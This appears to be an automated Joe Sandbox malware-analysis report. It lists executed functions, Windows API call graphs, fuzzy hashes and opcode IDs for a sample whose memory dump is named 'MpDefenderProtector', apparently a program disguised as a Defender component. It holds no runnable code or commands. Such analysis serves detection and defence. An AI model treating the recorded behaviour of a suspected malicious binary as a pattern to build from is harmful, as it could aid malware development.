                                      execution_graph 18858 27d5f8c 18860 27d5f17 18858->18860 18859 27d5f9a 18860->18859 18862 27db718 CreateActCtxA 18860->18862 18861 27d5fbe 18862->18861 18824 27de35e 18825 27de396 GetCurrentProcess 18824->18825 18827 27de3e8 GetCurrentThread 18825->18827 18828 27de3e1 18825->18828 18829 27de425 GetCurrentProcess 18827->18829 18831 27de41e 18827->18831 18828->18827 18830 27de45b 18829->18830 18832 27de483 GetCurrentThreadId 18830->18832 18831->18829 18833 27de4b4 18832->18833 18834 27de598 DuplicateHandle 18835 27de62e 18834->18835 18836 27d5e98 18837 27d5ec5 18836->18837 18838 27d5f9a 18837->18838 18841 27db718 18837->18841 18839 27d5fbe 18842 27db73d 18841->18842 18846 27db828 18842->18846 18850 27db818 18842->18850 18843 27db747 18843->18839 18848 27db84f 18846->18848 18847 27db92c 18847->18847 18848->18847 18854 27d7894 18848->18854 18852 27db84f 18850->18852 18851 27db92c 18851->18851 18852->18851 18853 27d7894 CreateActCtxA 18852->18853 18853->18851 18855 27dc8b8 CreateActCtxA 18854->18855 18857 27dc97b 18855->18857

                                      Executed Functions

                                      Function 027DE35E Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 528 27de35e-27de3df GetCurrentProcess 532 27de3e8-27de41c GetCurrentThread 528->532 533 27de3e1-27de3e7 528->533 534 27de41e-27de424 532->534 535 27de425-27de459 GetCurrentProcess 532->535 533->532 534->535 537 27de45b-27de461 535->537 538 27de462-27de47d call 27de521 535->538 537->538 540 27de483-27de4b2 GetCurrentThreadId 538->540 542 27de4bb-27de51d 540->542 543 27de4b4-27de4ba 540->543 543->542
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 027DE3CE
                                      • GetCurrentThread.KERNEL32 ref: 027DE40B
                                      • GetCurrentProcess.KERNEL32 ref: 027DE448
                                      • GetCurrentThreadId.KERNEL32 ref: 027DE4A1
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1312785468.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_27d0000_MpDefenderProtector.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: b8257423805ad2543c3c38b008a8072ea094633cb9945c7e8a74232c8230bb71
                                      • Instruction ID: 81cd4c8ef0a07d226274612d66ed53749b3fea939ed49f386c8a321e2ee83d49
                                      • Opcode Fuzzy Hash: b8257423805ad2543c3c38b008a8072ea094633cb9945c7e8a74232c8230bb71
                                      • Instruction Fuzzy Hash: 9B5144B0900349CFEB15DFA9D548BAEBBF1EB48314F208459E419AB390CB34A945CF66
                                      Function 027D7894 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1258 27d7894-27dc979 CreateActCtxA 1261 27dc97b-27dc981 1258->1261 1262 27dc982-27dc9dc 1258->1262 1261->1262 1269 27dc9de-27dc9e1 1262->1269 1270 27dc9eb-27dc9ef 1262->1270 1269->1270 1271 27dc9f1-27dc9fd 1270->1271 1272 27dca00 1270->1272 1271->1272 1274 27dca01 1272->1274 1274->1274
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 027DC969
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1312785468.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_27d0000_MpDefenderProtector.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 51be38df00204b1af60bdb5bf870835ca918f0422610827a45f922ef9fba8683
                                      • Instruction ID: 9393d4162df28ce3ead2726ce56b85bc172dd375e4f106597720b1fc930f1fad
                                      • Opcode Fuzzy Hash: 51be38df00204b1af60bdb5bf870835ca918f0422610827a45f922ef9fba8683
                                      • Instruction Fuzzy Hash: 9241C3B1C0071DCBEB25DFA9C844B9DBBF5BF48304F20816AD409AB255DB756946CF90
                                      Function 027DC8AC Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1275 27dc8ac-27dc979 CreateActCtxA 1277 27dc97b-27dc981 1275->1277 1278 27dc982-27dc9dc 1275->1278 1277->1278 1285 27dc9de-27dc9e1 1278->1285 1286 27dc9eb-27dc9ef 1278->1286 1285->1286 1287 27dc9f1-27dc9fd 1286->1287 1288 27dca00 1286->1288 1287->1288 1290 27dca01 1288->1290 1290->1290
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 027DC969
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1312785468.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_27d0000_MpDefenderProtector.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 29781d52a7f12eaf038946dd3cdebe1e8b5063441e935792e275b3cba0b9e87a
                                      • Instruction ID: 174cae911cbdb0857740d2a695a2861c967b3df7d8b9a9ff0f4ba9319a51d282
                                      • Opcode Fuzzy Hash: 29781d52a7f12eaf038946dd3cdebe1e8b5063441e935792e275b3cba0b9e87a
                                      • Instruction Fuzzy Hash: 0841F2B1C00719CFEB29DFA9C98479DBBF2BF48304F20816AD409AB255DB756A46CF50
                                      Function 027DE590 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1291 27de590-27de593 1292 27de598-27de62c DuplicateHandle 1291->1292 1293 27de62e-27de634 1292->1293 1294 27de635-27de652 1292->1294 1293->1294
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 027DE61F
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1312785468.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_27d0000_MpDefenderProtector.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 9503af3685ea8eeea3e6a03d492bfc9b13a2553d536068e986d00abca9fd9447
                                      • Instruction ID: 861f08645dbdc48bbfc13f8030accb3245ca80a5ed8239cc94dfe03d3c37a68c
                                      • Opcode Fuzzy Hash: 9503af3685ea8eeea3e6a03d492bfc9b13a2553d536068e986d00abca9fd9447
                                      • Instruction Fuzzy Hash: DC2114B5D00309AFDB10CF9AD884ADEBBF4EB48324F14801AE914A3310D379A941CFA5
                                      Function 027DE598 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1297 27de598-27de62c DuplicateHandle 1298 27de62e-27de634 1297->1298 1299 27de635-27de652 1297->1299 1298->1299
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 027DE61F
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1312785468.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_27d0000_MpDefenderProtector.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 7f7e391e59210dc68670b4a3e1dcdb69218737b5a3d69fb22aaa33d91e04f713
                                      • Instruction ID: defb8dccff0d8202a1b6bcd880da6f51764c85cef3a5f4f7d96e384a4dd50018
                                      • Opcode Fuzzy Hash: 7f7e391e59210dc68670b4a3e1dcdb69218737b5a3d69fb22aaa33d91e04f713
                                      • Instruction Fuzzy Hash: 7021E4B5D003099FDB10CF9AD984ADEBBF5EB48320F14801AE914A7350D378A945CF65

                                      Execution Graph

                                      Execution Coverage:9.8%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:1504
                                      Total number of Limit Nodes:27
                                      execution_graph 22910 eeaee0 22911 eeaeea __EH_prolog 22910->22911 23073 ed130b 22911->23073 22914 eeaf2c 22918 eeaf39 22914->22918 22919 eeafa2 22914->22919 22978 eeaf18 22914->22978 22915 eeb5cb 23151 eecd2e 22915->23151 22923 eeaf3e 22918->22923 22924 eeaf75 22918->22924 22922 eeb041 GetDlgItemTextW 22919->22922 22928 eeafbc 22919->22928 22920 eeb5e9 SendMessageW 22921 eeb5f7 22920->22921 22926 eeb600 SendDlgItemMessageW 22921->22926 22927 eeb611 GetDlgItem SendMessageW 22921->22927 22922->22924 22925 eeb077 22922->22925 22933 edddd1 53 API calls 22923->22933 22923->22978 22929 eeaf96 KiUserCallbackDispatcher 22924->22929 22924->22978 22930 eeb08f GetDlgItem 22925->22930 23070 eeb080 22925->23070 22926->22927 23169 ee9da4 GetCurrentDirectoryW 22927->23169 22932 edddd1 53 API calls 22928->22932 22929->22978 22935 eeb0a4 SendMessageW SendMessageW 22930->22935 22936 eeb0c5 SetFocus 22930->22936 22937 eeafde SetDlgItemTextW 22932->22937 22938 eeaf58 22933->22938 22934 eeb641 GetDlgItem 22939 eeb65e 22934->22939 22940 eeb664 SetWindowTextW 22934->22940 22935->22936 22941 eeb0d5 22936->22941 22953 eeb0ed 22936->22953 22942 eeafec 22937->22942 23191 ed1241 SHGetMalloc 22938->23191 22939->22940 23170 eea2c7 GetClassNameW 22940->23170 22947 edddd1 53 API calls 22941->22947 22951 eeaff9 GetMessageW 22942->22951 22942->22978 22944 eeaf5f 22948 eeaf63 SetDlgItemTextW 22944->22948 22944->22978 22945 eeb56b 22949 edddd1 53 API calls 22945->22949 22952 eeb0df 22947->22952 22948->22978 22954 eeb57b SetDlgItemTextW 22949->22954 22956 eeb010 IsDialogMessageW 22951->22956 22951->22978 23192 eecb5a 22952->23192 22961 edddd1 53 API calls 22953->22961 22958 eeb58f 22954->22958 22956->22942 22960 eeb01f TranslateMessage DispatchMessageW 22956->22960 22964 edddd1 53 API calls 22958->22964 22960->22942 22963 eeb124 22961->22963 22962 eeb6af 22966 eeb6df 22962->22966 22971 edddd1 53 API calls 22962->22971 22967 ed400a _swprintf 51 API calls 22963->22967 22968 eeb5b8 22964->22968 22965 eebdf5 98 API calls 22965->22962 22977 eebdf5 98 API calls 22966->22977 23021 eeb797 22966->23021 22972 eeb136 22967->22972 22973 edddd1 53 API calls 22968->22973 22969 eeb0e6 23083 eda04f 22969->23083 22975 eeb6c2 SetDlgItemTextW 22971->22975 22976 eecb5a 16 API calls 22972->22976 22973->22978 22985 edddd1 53 API calls 22975->22985 22976->22969 22986 eeb6fa 22977->22986 22979 eeb847 22982 eeb859 22979->22982 22983 eeb850 EnableWindow 22979->22983 22980 eeb17f 23089 eea322 SetCurrentDirectoryW 22980->23089 22981 eeb174 GetLastError 22981->22980 22987 eeb876 22982->22987 23210 ed12c8 GetDlgItem EnableWindow 22982->23210 22983->22982 22989 eeb6d6 SetDlgItemTextW 22985->22989 22995 eeb70c 22986->22995 23009 eeb731 22986->23009 22994 eeb89d 22987->22994 23001 eeb895 SendMessageW 22987->23001 22988 eeb195 22992 eeb19e GetLastError 22988->22992 22993 eeb1ac 22988->22993 22989->22966 22991 eeb78a 22997 eebdf5 98 API calls 22991->22997 22992->22993 23000 eeb227 22993->23000 23005 eeb237 22993->23005 23006 eeb1c4 GetTickCount 22993->23006 22994->22978 23002 edddd1 53 API calls 22994->23002 23208 ee9635 32 API calls 22995->23208 22996 eeb86c 23211 ed12c8 GetDlgItem EnableWindow 22996->23211 22997->23021 23004 eeb46c 23000->23004 23000->23005 23001->22994 23008 eeb8b6 SetDlgItemTextW 23002->23008 23003 eeb725 23003->23009 23108 ed12e6 GetDlgItem ShowWindow 23004->23108 23011 eeb24f GetModuleFileNameW 23005->23011 23012 eeb407 23005->23012 23090 ed400a 23006->23090 23007 eeb825 23209 ee9635 32 API calls 23007->23209 23008->22978 23009->22991 23016 eebdf5 98 API calls 23009->23016 23202 edeb3a 80 API calls 23011->23202 23012->22924 23025 edddd1 53 API calls 23012->23025 23015 edddd1 53 API calls 23015->23021 23022 eeb75f 23016->23022 23017 eeb47c 23109 ed12e6 GetDlgItem ShowWindow 23017->23109 23019 eeb1dd 23093 ed971e 23019->23093 23020 eeb844 23020->22979 23021->22979 23021->23007 23021->23015 23022->22991 23026 eeb768 DialogBoxParamW 23022->23026 23024 eeb275 23028 ed400a _swprintf 51 API calls 23024->23028 23029 eeb41b 23025->23029 23026->22924 23026->22991 23027 eeb486 23110 edddd1 23027->23110 23031 eeb297 CreateFileMappingW 23028->23031 23032 ed400a _swprintf 51 API calls 23029->23032 23037 eeb2f9 GetCommandLineW 23031->23037 23067 eeb376 __vsnwprintf_l 23031->23067 23034 eeb439 23032->23034 23048 edddd1 53 API calls 23034->23048 23035 eeb203 23038 eeb20a GetLastError 23035->23038 23039 eeb215 23035->23039 23042 eeb30a 23037->23042 23038->23039 23101 ed9653 23039->23101 23040 eeb381 ShellExecuteExW 23062 eeb39e 23040->23062 23203 eeab2e SHGetMalloc 23042->23203 23045 eeb4a2 SetDlgItemTextW GetDlgItem 23046 eeb4bf GetWindowLongW SetWindowLongW 23045->23046 23047 eeb4d7 23045->23047 23046->23047 23114 eebdf5 23047->23114 23048->22924 23049 eeb326 23204 eeab2e SHGetMalloc 23049->23204 23053 eeb332 23205 eeab2e SHGetMalloc 23053->23205 23054 eeb3e1 23054->23012 23061 eeb3f7 UnmapViewOfFile CloseHandle 23054->23061 23055 eebdf5 98 API calls 23057 eeb4f3 23055->23057 23139 eed0f5 23057->23139 23058 eeb33e 23206 edecad 80 API calls ___scrt_get_show_window_mode 23058->23206 23061->23012 23062->23054 23065 eeb3cd Sleep 23062->23065 23064 eeb355 MapViewOfFile 23064->23067 23065->23054 23065->23062 23066 eebdf5 98 API calls 23071 eeb519 23066->23071 23067->23040 23068 eeb542 23207 ed12c8 GetDlgItem EnableWindow 23068->23207 23070->22924 23070->22945 23071->23068 23072 eebdf5 98 API calls 23071->23072 23072->23068 23074 ed136d 23073->23074 23075 ed1314 23073->23075 23213 edda71 GetWindowLongW SetWindowLongW 23074->23213 23076 ed137a 23075->23076 23212 edda98 62 API calls 2 library calls 23075->23212 23076->22914 23076->22915 23076->22978 23079 ed1336 23079->23076 23080 ed1349 GetDlgItem 23079->23080 23080->23076 23081 ed1359 23080->23081 23081->23076 23082 ed135f SetWindowTextW 23081->23082 23082->23076 23086 eda059 23083->23086 23084 eda0ea 23085 eda207 9 API calls 23084->23085 23087 eda113 23084->23087 23085->23087 23086->23084 23086->23087 23214 eda207 23086->23214 23087->22980 23087->22981 23089->22988 23261 ed3fdd 23090->23261 23094 ed9728 23093->23094 23095 ed9786 23094->23095 23096 ed9792 CreateFileW 23094->23096 23097 ed97e4 23095->23097 23098 edb66c 2 API calls 23095->23098 23096->23095 23097->23035 23099 ed97cb 23098->23099 23099->23097 23100 ed97cf CreateFileW 23099->23100 23100->23097 23102 ed9688 23101->23102 23103 ed9677 23101->23103 23102->23000 23103->23102 23104 ed968a 23103->23104 23105 ed9683 23103->23105 23353 ed96d0 23104->23353 23348 ed9817 23105->23348 23108->23017 23109->23027 23368 edddff 23110->23368 23113 ed12e6 GetDlgItem ShowWindow 23113->23045 23115 eebdff __EH_prolog 23114->23115 23121 eeb4e5 23115->23121 23391 eeaa36 23115->23391 23117 eebe36 _wcsrchr 23119 eeaa36 ExpandEnvironmentStringsW 23117->23119 23120 eec11d SetWindowTextW 23117->23120 23117->23121 23126 eebf0b SetFileAttributesW 23117->23126 23131 eec2e7 GetDlgItem SetWindowTextW SendMessageW 23117->23131 23134 eec327 SendMessageW 23117->23134 23395 ee17ac CompareStringW 23117->23395 23396 ee9da4 GetCurrentDirectoryW 23117->23396 23398 eda52a 7 API calls 23117->23398 23399 eda4b3 FindClose 23117->23399 23400 eeab9a 76 API calls new 23117->23400 23401 ef35de 23117->23401 23119->23117 23120->23117 23121->23055 23127 eebfc5 GetFileAttributesW 23126->23127 23138 eebf25 ___scrt_get_show_window_mode 23126->23138 23127->23117 23130 eebfd7 DeleteFileW 23127->23130 23130->23117 23132 eebfe8 23130->23132 23131->23117 23133 ed400a _swprintf 51 API calls 23132->23133 23135 eec008 GetFileAttributesW 23133->23135 23134->23117 23135->23132 23136 eec01d MoveFileW 23135->23136 23136->23117 23137 eec035 MoveFileExW 23136->23137 23137->23117 23138->23117 23138->23127 23397 edb4f7 52 API calls 2 library calls 23138->23397 23140 eed0ff __EH_prolog 23139->23140 23425 edfead 23140->23425 23142 eed130 23429 ed5c59 23142->23429 23144 eed14e 23433 ed7c68 23144->23433 23148 eed1a1 23450 ed7cfb 23148->23450 23150 eeb504 23150->23066 23152 eecd38 23151->23152 23923 ee9d1a 23152->23923 23155 eeb5d1 23155->22920 23155->22921 23156 eecd45 GetWindow 23156->23155 23161 eecd65 23156->23161 23157 eecd72 GetClassNameW 23928 ee17ac CompareStringW 23157->23928 23159 eecdfa GetWindow 23159->23155 23159->23161 23160 eecd96 GetWindowLongW 23160->23159 23162 eecda6 SendMessageW 23160->23162 23161->23155 23161->23157 23161->23159 23161->23160 23162->23159 23163 eecdbc GetObjectW 23162->23163 23929 ee9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23163->23929 23165 eecdd3 23930 ee9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23165->23930 23931 ee9f5d 8 API calls ___scrt_get_show_window_mode 23165->23931 23168 eecde4 SendMessageW DeleteObject 23168->23159 23169->22934 23171 eea2e8 23170->23171 23177 eea30d 23170->23177 23934 ee17ac CompareStringW 23171->23934 23173 eea31b 23178 eea7c3 23173->23178 23174 eea312 SHAutoComplete 23174->23173 23175 eea2fb 23176 eea2ff FindWindowExW 23175->23176 23175->23177 23176->23177 23177->23173 23177->23174 23179 eea7cd __EH_prolog 23178->23179 23180 ed1380 82 API calls 23179->23180 23181 eea7ef 23180->23181 23935 ed1f4f 23181->23935 23184 eea818 23186 ed1951 126 API calls 23184->23186 23185 eea809 23187 ed1631 84 API calls 23185->23187 23189 eea83a __vsnwprintf_l new 23186->23189 23188 eea814 23187->23188 23188->22962 23188->22965 23189->23188 23190 ed1631 84 API calls 23189->23190 23190->23188 23191->22944 23943 eeac74 PeekMessageW 23192->23943 23195 eecbbc SendMessageW SendMessageW 23197 eecbf8 23195->23197 23198 eecc17 SendMessageW SendMessageW SendMessageW 23195->23198 23196 eecb88 23201 eecb93 ShowWindow SendMessageW SendMessageW 23196->23201 23197->23198 23199 eecc6d SendMessageW 23198->23199 23200 eecc4a SendMessageW 23198->23200 23199->22969 23200->23199 23201->23195 23202->23024 23203->23049 23204->23053 23205->23058 23206->23064 23207->23070 23208->23003 23209->23020 23210->22996 23211->22987 23212->23079 23213->23076 23215 eda214 23214->23215 23216 eda238 23215->23216 23217 eda22b CreateDirectoryW 23215->23217 23235 eda180 23216->23235 23217->23216 23219 eda26b 23217->23219 23224 eda27a 23219->23224 23227 eda444 23219->23227 23221 eda27e GetLastError 23221->23224 23224->23086 23225 eda254 23225->23221 23226 eda258 CreateDirectoryW 23225->23226 23226->23219 23226->23221 23248 eee360 23227->23248 23230 eda494 23230->23224 23231 eda467 23232 edb66c 2 API calls 23231->23232 23233 eda47b 23232->23233 23233->23230 23234 eda47f SetFileAttributesW 23233->23234 23234->23230 23250 eda194 23235->23250 23238 edb66c 23239 edb679 23238->23239 23240 edb683 23239->23240 23258 edb806 CharUpperW 23239->23258 23240->23225 23242 edb692 23259 edb832 CharUpperW 23242->23259 23244 edb6a1 23245 edb71c GetCurrentDirectoryW 23244->23245 23246 edb6a5 23244->23246 23245->23240 23260 edb806 CharUpperW 23246->23260 23249 eda451 SetFileAttributesW 23248->23249 23249->23230 23249->23231 23251 eee360 23250->23251 23252 eda1a1 GetFileAttributesW 23251->23252 23253 eda189 23252->23253 23254 eda1b2 23252->23254 23253->23221 23253->23238 23255 edb66c 2 API calls 23254->23255 23256 eda1c6 23255->23256 23256->23253 23257 eda1ca GetFileAttributesW 23256->23257 23257->23253 23258->23242 23259->23244 23260->23240 23262 ed3ff4 ___scrt_initialize_default_local_stdio_options 23261->23262 23265 ef5759 23262->23265 23268 ef3837 23265->23268 23269 ef385f 23268->23269 23270 ef3877 23268->23270 23292 ef895a 20 API calls __dosmaperr 23269->23292 23270->23269 23272 ef387f 23270->23272 23294 ef3dd6 23272->23294 23273 ef3864 23293 ef8839 26 API calls _abort 23273->23293 23277 ef386f 23285 eeec4a 23277->23285 23280 ef3907 23303 ef4186 51 API calls 3 library calls 23280->23303 23281 ed3ffe 23281->23019 23284 ef3912 23304 ef3e59 20 API calls _free 23284->23304 23286 eeec55 IsProcessorFeaturePresent 23285->23286 23287 eeec53 23285->23287 23289 eef267 23286->23289 23287->23281 23305 eef22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23289->23305 23291 eef34a 23291->23281 23292->23273 23293->23277 23295 ef388f 23294->23295 23296 ef3df3 23294->23296 23302 ef3da1 20 API calls 2 library calls 23295->23302 23296->23295 23306 ef8fa5 GetLastError 23296->23306 23298 ef3e14 23326 ef90fa 38 API calls __fassign 23298->23326 23300 ef3e2d 23327 ef9127 38 API calls __fassign 23300->23327 23302->23280 23303->23284 23304->23277 23305->23291 23307 ef8fbb 23306->23307 23308 ef8fc1 23306->23308 23328 efa61b 11 API calls 2 library calls 23307->23328 23312 ef9010 SetLastError 23308->23312 23329 ef85a9 23308->23329 23312->23298 23313 ef8fdb 23336 ef84de 23313->23336 23316 ef8ff0 23316->23313 23318 ef8ff7 23316->23318 23317 ef8fe1 23319 ef901c SetLastError 23317->23319 23343 ef8e16 20 API calls __dosmaperr 23318->23343 23344 ef8566 38 API calls _abort 23319->23344 23321 ef9002 23323 ef84de _free 20 API calls 23321->23323 23325 ef9009 23323->23325 23325->23312 23325->23319 23326->23300 23327->23295 23328->23308 23334 ef85b6 __dosmaperr 23329->23334 23330 ef85f6 23346 ef895a 20 API calls __dosmaperr 23330->23346 23331 ef85e1 RtlAllocateHeap 23332 ef85f4 23331->23332 23331->23334 23332->23313 23342 efa671 11 API calls 2 library calls 23332->23342 23334->23330 23334->23331 23345 ef71ad 7 API calls 2 library calls 23334->23345 23337 ef84e9 RtlFreeHeap 23336->23337 23338 ef8512 __dosmaperr 23336->23338 23337->23338 23339 ef84fe 23337->23339 23338->23317 23347 ef895a 20 API calls __dosmaperr 23339->23347 23341 ef8504 GetLastError 23341->23338 23342->23316 23343->23321 23345->23334 23346->23332 23347->23341 23349 ed9820 23348->23349 23352 ed9824 23348->23352 23349->23102 23352->23349 23359 eda12d 23352->23359 23354 ed96dc 23353->23354 23355 ed96fa 23353->23355 23354->23355 23357 ed96e8 CloseHandle 23354->23357 23356 ed9719 23355->23356 23367 ed6e3e 74 API calls 23355->23367 23356->23102 23357->23355 23360 eee360 23359->23360 23361 eda13a DeleteFileW 23360->23361 23362 eda14d 23361->23362 23363 ed984c 23361->23363 23364 edb66c 2 API calls 23362->23364 23363->23102 23365 eda161 23364->23365 23365->23363 23366 eda165 DeleteFileW 23365->23366 23366->23363 23367->23356 23374 edd28a 23368->23374 23371 edddfc SetDlgItemTextW 23371->23113 23372 edde22 LoadStringW 23372->23371 23373 edde39 LoadStringW 23372->23373 23373->23371 23379 edd1c3 23374->23379 23376 edd2a7 23377 edd2bc 23376->23377 23387 edd2c8 26 API calls 23376->23387 23377->23371 23377->23372 23380 edd1de 23379->23380 23386 edd1d7 _strncpy 23379->23386 23382 edd202 23380->23382 23388 ee1596 WideCharToMultiByte 23380->23388 23385 edd233 23382->23385 23389 eddd6b 50 API calls __vsnprintf 23382->23389 23390 ef58d9 26 API calls 3 library calls 23385->23390 23386->23376 23387->23377 23388->23382 23389->23385 23390->23386 23392 eeaa40 23391->23392 23393 eeaaf3 ExpandEnvironmentStringsW 23392->23393 23394 eeab16 23392->23394 23393->23394 23394->23117 23395->23117 23396->23117 23397->23138 23398->23117 23399->23117 23400->23117 23402 ef8606 23401->23402 23403 ef861e 23402->23403 23404 ef8613 23402->23404 23406 ef8626 23403->23406 23412 ef862f __dosmaperr 23403->23412 23414 ef8518 23404->23414 23409 ef84de _free 20 API calls 23406->23409 23407 ef8659 HeapReAlloc 23411 ef861b 23407->23411 23407->23412 23408 ef8634 23421 ef895a 20 API calls __dosmaperr 23408->23421 23409->23411 23411->23117 23412->23407 23412->23408 23422 ef71ad 7 API calls 2 library calls 23412->23422 23415 ef8556 23414->23415 23419 ef8526 __dosmaperr 23414->23419 23424 ef895a 20 API calls __dosmaperr 23415->23424 23416 ef8541 RtlAllocateHeap 23418 ef8554 23416->23418 23416->23419 23418->23411 23419->23415 23419->23416 23423 ef71ad 7 API calls 2 library calls 23419->23423 23421->23411 23422->23412 23423->23419 23424->23418 23426 edfeba 23425->23426 23454 ed1789 23426->23454 23428 edfed2 23428->23142 23430 edfead 23429->23430 23431 ed1789 76 API calls 23430->23431 23432 edfed2 23431->23432 23432->23144 23434 ed7c72 __EH_prolog 23433->23434 23471 edc827 23434->23471 23436 ed7c8d 23477 eee24a 23436->23477 23438 ed7cb7 23483 ee440b 23438->23483 23441 ed7ddf 23442 ed7de9 23441->23442 23447 ed7e53 23442->23447 23515 eda4c6 23442->23515 23444 ed7f06 23444->23148 23445 ed7ec4 23445->23444 23521 ed6dc1 74 API calls 23445->23521 23447->23445 23449 eda4c6 8 API calls 23447->23449 23493 ed837f 23447->23493 23449->23447 23451 ed7d09 23450->23451 23453 ed7d10 23450->23453 23452 ee1acf 84 API calls 23451->23452 23452->23453 23455 ed179f 23454->23455 23466 ed17fa __vsnwprintf_l 23454->23466 23456 ed17c8 23455->23456 23467 ed6e91 74 API calls __vswprintf_c_l 23455->23467 23458 ed1827 23456->23458 23459 ed17e7 new 23456->23459 23461 ef35de 22 API calls 23458->23461 23459->23466 23469 ed6efd 75 API calls 23459->23469 23460 ed17be 23468 ed6efd 75 API calls 23460->23468 23463 ed182e 23461->23463 23463->23466 23470 ed6efd 75 API calls 23463->23470 23466->23428 23467->23460 23468->23456 23469->23466 23470->23466 23472 edc831 __EH_prolog 23471->23472 23473 eee24a new 8 API calls 23472->23473 23474 edc874 23473->23474 23475 eee24a new 8 API calls 23474->23475 23476 edc898 23475->23476 23476->23436 23480 eee24f new 23477->23480 23478 eee27b 23478->23438 23480->23478 23489 ef71ad 7 API calls 2 library calls 23480->23489 23490 eeecce RaiseException __CxxThrowException@8 new 23480->23490 23491 eeecb1 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 23480->23491 23484 ee4415 __EH_prolog 23483->23484 23485 eee24a new 8 API calls 23484->23485 23486 ee4431 23485->23486 23487 ed7ce6 23486->23487 23492 ee06ba 78 API calls 23486->23492 23487->23441 23489->23480 23492->23487 23494 ed8389 __EH_prolog 23493->23494 23522 ed1380 23494->23522 23496 ed83a4 23530 ed9ef7 23496->23530 23502 ed83d3 23653 ed1631 23502->23653 23503 ed846e 23549 ed8517 23503->23549 23506 ed84ce 23556 ed1f00 23506->23556 23510 ed83cf 23510->23502 23510->23503 23512 eda4c6 8 API calls 23510->23512 23657 edbac4 CompareStringW 23510->23657 23511 ed84d9 23511->23502 23560 ed3aac 23511->23560 23570 ed857b 23511->23570 23512->23510 23516 eda4db 23515->23516 23520 eda4df 23516->23520 23911 eda5f4 23516->23911 23518 eda4ef 23519 eda4f4 FindClose 23518->23519 23518->23520 23519->23520 23520->23442 23521->23444 23523 ed1385 __EH_prolog 23522->23523 23524 edc827 8 API calls 23523->23524 23525 ed13bd 23524->23525 23526 eee24a new 8 API calls 23525->23526 23529 ed1416 ___scrt_get_show_window_mode 23525->23529 23527 ed1403 23526->23527 23527->23529 23658 edb07d 23527->23658 23529->23496 23531 ed9f0e 23530->23531 23532 ed83ba 23531->23532 23674 ed6f5d 76 API calls 23531->23674 23532->23502 23534 ed19a6 23532->23534 23535 ed19b0 __EH_prolog 23534->23535 23538 ed1a00 23535->23538 23547 ed19e5 23535->23547 23675 ed709d 23535->23675 23537 ed1b50 23678 ed6dc1 74 API calls 23537->23678 23538->23537 23541 ed1b60 23538->23541 23538->23547 23540 ed3aac 97 API calls 23542 ed1bb3 23540->23542 23541->23540 23541->23547 23543 ed1bff 23542->23543 23545 ed3aac 97 API calls 23542->23545 23543->23547 23548 ed1c32 23543->23548 23679 ed6dc1 74 API calls 23543->23679 23545->23542 23546 ed3aac 97 API calls 23546->23548 23547->23510 23548->23546 23548->23547 23550 ed8524 23549->23550 23697 ee0c26 GetSystemTime SystemTimeToFileTime 23550->23697 23552 ed8488 23552->23506 23553 ee1359 23552->23553 23699 eed51a 23553->23699 23557 ed1f05 __EH_prolog 23556->23557 23558 ed1f39 23557->23558 23707 ed1951 23557->23707 23558->23511 23561 ed3abc 23560->23561 23562 ed3ab8 23560->23562 23563 ed3ae9 23561->23563 23564 ed3af7 23561->23564 23562->23511 23565 ed3b29 23563->23565 23841 ed3281 85 API calls 3 library calls 23563->23841 23842 ed27e8 97 API calls 3 library calls 23564->23842 23565->23511 23568 ed3af5 23568->23565 23843 ed204e 74 API calls 23568->23843 23571 ed8585 __EH_prolog 23570->23571 23572 ed85be 23571->23572 23580 